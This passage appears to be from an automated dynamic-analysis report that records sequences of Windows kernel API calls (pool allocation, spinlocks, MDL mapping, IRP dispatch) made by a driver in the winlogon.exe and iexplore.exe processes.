| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0004c9e7d00, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0xffffd000292aa4e0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd000292aa4d0, ret_val_unk_out = 0xffffe0003c7061b0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10, Tag = 0x54444953, ret_val_ptr_out = 0xffffe0003c634250 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c7061b0, Irp_unk_out = 0xffffe0003c7061b0, ret_val_out = 0x103 |
| KeSetEvent | Event_unk = 0xffffd000292aa4e0, Increment_unk = 0x0, Wait = 0, Event_unk_out = 0xffffd000292aa4e0, ret_val_out = 0 |
| KeWaitForMutexObject | ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634250, Tag = 0x54444953 |
| ZwClose | Handle_unk = 0xffffffff80000ffc, ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd000292aa060 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd000292a9fd0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80001060 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b66dc, SpinLock_unk_out = 0xffffe0003a7b66dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b66dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b66dc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b66dc, SpinLock_unk_out = 0xffffe0003a7b66dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b66dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b66dc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x54444953 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003b098f40, Tag = 0x54444953 |
| ExFreePoolWithTag | P_ptr = 0xffffe00040932cf0, Tag = 0x54444953 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a4beb50, ret_val_ptr_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| MmAllocatePagesForMdl | LowAddress_unk = 0x0, HighAddress_unk = 0xffffffffffffffff, SkipBytes_unk = 0x0, TotalBytes_ptr = 0x7d9, ret_val_unk_out = 0xffffe0003c261580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c261580, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a4e6000 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c261580, AccessMode_unk = 0x1, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x20, ret_val_ptr_out = 0x4e0000 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a779010, Tag = 0x0 |
| IoCompleteRequest | ret_val_out = 0x0 |
Execution Path #89 (length: 6, count: 2, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 6 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmIsAddressValid | VirtualAddress_ptr = 0xffffd0002a4e6000, ret_val_out = 1 |
| MmUnmapLockedPages | BaseAddress_ptr = 0x4e0000, MemoryDescriptorList_unk = 0xffffe0003c261580 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a4e6000, MemoryDescriptorList_unk = 0xffffe0003c261580 |
| MmFreePagesFromMdl | MemoryDescriptorList_unk = 0xffffe0003c261580 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c261580 |
| IoCompleteRequest | ret_val_out = 0x0 |
Execution Path #90 (length: 15, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 15 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b8fbc110 |
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000ba1495b0 |
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b8567010 |
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b91041c0 |
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b8e43d00 |
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b83dbbe0 |
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b90dee10 |
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b9323ef0 |
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b74c7950 |
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b9ddc890 |
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b9f0c360 |
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000ba12f220 |
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b7ebdef0 |
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffc000b7afe8d0 |
| IoCompleteRequest | ret_val_out = 0x0 |
Execution Path #91 (length: 13, count: 11, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 13 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 11 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bd56930, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0xfffff80000000010, ret_val_ptr_out = 0xffffd0002a699e38 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x1c5, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a77e010 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a77e0f4, Length = 0xdd, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7881bc, SpinLock_unk_out = 0xffffe0003a7881bc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7881bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7881bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7881bc, SpinLock_unk_out = 0xffffe0003a7881bc, ret_val_unk_out = 0x0 |
| IoAllocateIrp | StackSize = 3, ChargeQuota = 0, ret_val_unk_out = 0xffffe0003c839cf0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7881bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a7881bc |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x103 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #95 (length: 27, count: 28, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 27 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 28 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bcb2440, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a87de38 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7881bc, SpinLock_unk_out = 0xffffe0003a7881bc, ret_val_unk_out = 0x0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x20e8, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a77f000 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a77f0e4, Length = 0x2000, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| IoAllocateIrp | StackSize = 3, ChargeQuota = 0, ret_val_unk_out = 0xffffe0003c839cf0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7881bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a7881bc |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7881bc, SpinLock_unk_out = 0xffffe0003a7881bc, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7881bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7881bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoFreeIrp | Irp_unk = 0xffffe0003c839cf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #97 (length: 15, count: 13, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 15 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 13 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bcb2440, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a87eef8 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c1f8, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c1f8, ret_val_out = 1 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77f000, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| IoCompleteRequest | ret_val_out = 0x60900 |
Execution Path #98 (length: 12, count: 9, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 12 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 9 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bcb2440, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a891e38 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7881bc, SpinLock_unk_out = 0xffffe0003a7881bc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7881bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a7881bc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #187 (length: 89, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 89 |
Processes
»
| Process | Count |
|---|---|
| Process 42 (iexplore.exe, PID: 556) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ObReferenceObjectByHandle | Handle_unk = 0xffffffff80000d00, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0x0, Object_ptr_out = 0xffffd00035626c18, Object_out = 0xffffe0003c4b7cd0, HandleInformation_unk_out = 0x0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003c4b7cd0, ret_val_ptr_out = 0x7fff |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x28, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a782560 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c84acf0, Irp_unk_out = 0xffffe0003c84acf0, ret_val_out = 0x103 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x22c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x467, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a77c010 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x22c, Process_unk_out = 0xffffd00035626540, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003bf66080, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd000356264f8, Handle_out = 0xffffffff80000cfc, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000cfc, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd000356264f0, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x9a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003af83ef0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000cfc, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x9a, ProcessInformation_ptr_out = 0xffffe0003af83ef0, ReturnLength_ptr_out = 0xffffd000356264f0, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000cfc, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003bf66080, ret_val_ptr_out = 0x380f1 |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Program Files\Internet Explorer\iexplore.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b79bad0, Irp_unk_out = 0xffffe0003b79bad0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a77c18c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003a4ae280 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c439c20, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd00035626340, ret_val_unk_out = 0xffffe0003b4669f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003a4ae280, MemoryDescriptorList_unk_out = 0xffffe0003a4ae280 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c439c20, Irp_unk = 0xffffe0003b4669f0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b4669f0, Irp_unk_out = 0xffffe0003b4669f0, ret_val_out = 0x103 |
| IoFreeMdl | Mdl_unk = 0xffffe0003a4ae280 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77c464, SpinLock_unk_out = 0xffffe0003a77c464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77c464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77c464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
